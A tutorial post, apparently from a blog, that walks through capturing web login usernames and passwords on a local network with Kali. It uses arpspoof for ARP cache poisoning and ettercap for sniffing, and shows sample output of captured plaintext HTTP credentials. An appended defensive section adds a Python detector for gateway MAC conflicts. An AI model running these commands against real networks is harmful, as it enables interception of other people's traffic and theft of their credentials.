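How to capture web login usernames and passwords with Kali
Prepare Kali and a target machine.
1. In a terminal, enter
    echo 1 >/proc/sys/net/ipv4/ip_forward
This enables IP forwarding on the Kali host so that the target does not lose its network connection while the ARP attack is running. The command produces no output.
2. Use cat to check that the setting took effect
    cat /proc/sys/net/ipv4/ip_forward
    1
An output of '1' means the setting succeeded.
3. Launch the ARP attack; once it has succeeded it can be stopped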
    arpspoof -i eth0 -t 192.168.43.176 192.168.43.1
    0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 0:c:29:d4:f5:ff
    0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 0:c:29:d4:f5:ff
    ^CCleaning up and re-arping targets...
    0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
    0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
    0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
    0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
    0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
Syntax: arpspoof -i <interface> -t <target IP> <gateway>
4. Put Kali into a state where it captures credentials whenever they appear
    ettercap -Tq -i eth0
    ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
    Listening on:
      eth0 -> 00:0C:29:D4:F5:FF
          192.168.43.80/255.255.255.0
          fe80::20c:29ff:fed4:f5ff/64
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
    Privileges dropped to EUID 65534 EGID 65534...
      33 plugins
      42 protocol dissectors
      57 ports monitored
    20388 mac vendor fingerprint
    1766 tcp OS fingerprint
    2182 known services
    Lua: no scripts were specified, not starting up!
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %
    3 hosts added to the hosts list...
    Starting Unified sniffing...
    Text only Interface activated...
    Hit 'h' for inline help
##### In ettercap -Tq -i eth0, T starts text mode and q is quiet mode
5. On the target machine, visit a web page that has a login form. I use the 7k7k mini-games site as an example. The following then appears automatically on the command line
    HTTP : 115.182.59.143:80 -> USER: 星光灿烂 PASS: 123456 INFO: http://zc.7k7k.com/minilogin?callback=hdcallback_1500614556030
    CONTENT: username=%E6%98%9F%E5%85%89%E7%81%BF%E7%83%82&password=123456&autologin=checked&rf=http%3A%2F%2Fwww.7k7k.com%2F%3Fdaohangqq1%23bottom
    HTTP : 115.182.59.143:80 -> USER: test PASS: 123456 INFO: http://zc.7k7k.com/minilogin?callback=hdcallback_1500614556030
    CONTENT: username=test&password=123456&autologin=checked&rf=http%3A%2F%2Fwww.7k7k.com%2F%3Fdaohangqq1%23bottom
The two entries above are essentially the same, but when a Chinese username is used, what is produced is
    username=%E6%98%9F%E5%85%89%E7%81%BF%E7%83%82
rather than USER: 星光灿烂. URL-decoding this string gives the corresponding Chinese characters; an online decoder is enough.
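
Read from the defending side, the arpspoof output in step 3 carries two indicators of ARP cache poisoning: the gateway 192.168.43.1 is advertised with two different MAC addresses, and some replies are sent from one MAC while advertising another. The Python check below is an added example, not part of the original post; it assumes the first column of each line is the Ethernet source MAC, and the names find_arp_anomalies and norm_mac are hypothetical.

```python
import re
from collections import defaultdict

# Lines copied from the arpspoof output in step 3 (one per distinct kind).
# Assumed column order: frame source MAC, frame destination MAC, ethertype, length.
SAMPLE = """\
0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 0:c:29:d4:f5:ff
0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 0:c:29:d4:f5:ff
^CCleaning up and re-arping targets...
0:c:29:d4:f5:ff 0:c:29:a1:54:74 0806 42: arp reply 192.168.43.1 is-at 4e:49:e3:64:55:87
"""

LINE = re.compile(
    r"^(?P<src>[0-9a-f:]+) (?P<dst>[0-9a-f:]+) 0806 \d+: "
    r"arp reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]+)$",
    re.I)

def norm_mac(mac):
    """Zero-pad and lowercase each octet so 0:c:29 and 00:0C:29 compare equal."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def find_arp_anomalies(text):
    """Return (conflicts, mismatches).

    conflicts:  {ip: sorted MACs} for every IP advertised by more than one MAC.
    mismatches: (ip, frame source, advertised MAC) where the two MACs differ.
    """
    claims = defaultdict(set)
    mismatches = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # skip non-ARP lines such as the Ctrl-C cleanup message
        src, mac = norm_mac(m["src"]), norm_mac(m["mac"])
        claims[m["ip"]].add(mac)
        if src != mac:
            mismatches.append((m["ip"], src, mac))
    conflicts = {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}
    return conflicts, mismatches

if __name__ == "__main__":
    conflicts, mismatches = find_arp_anomalies(SAMPLE)
    for ip, macs in conflicts.items():
        print(f"ALERT {ip} advertised by {len(macs)} MACs: {', '.join(macs)}")
    for ip, src, mac in mismatches:
        print(f"NOTE  {ip}: frame from {src} advertises {mac}")
```

A gateway IP that flips between MAC addresses is the condition that static ARP entries for the gateway or switch-level dynamic ARP inspection are meant to prevent.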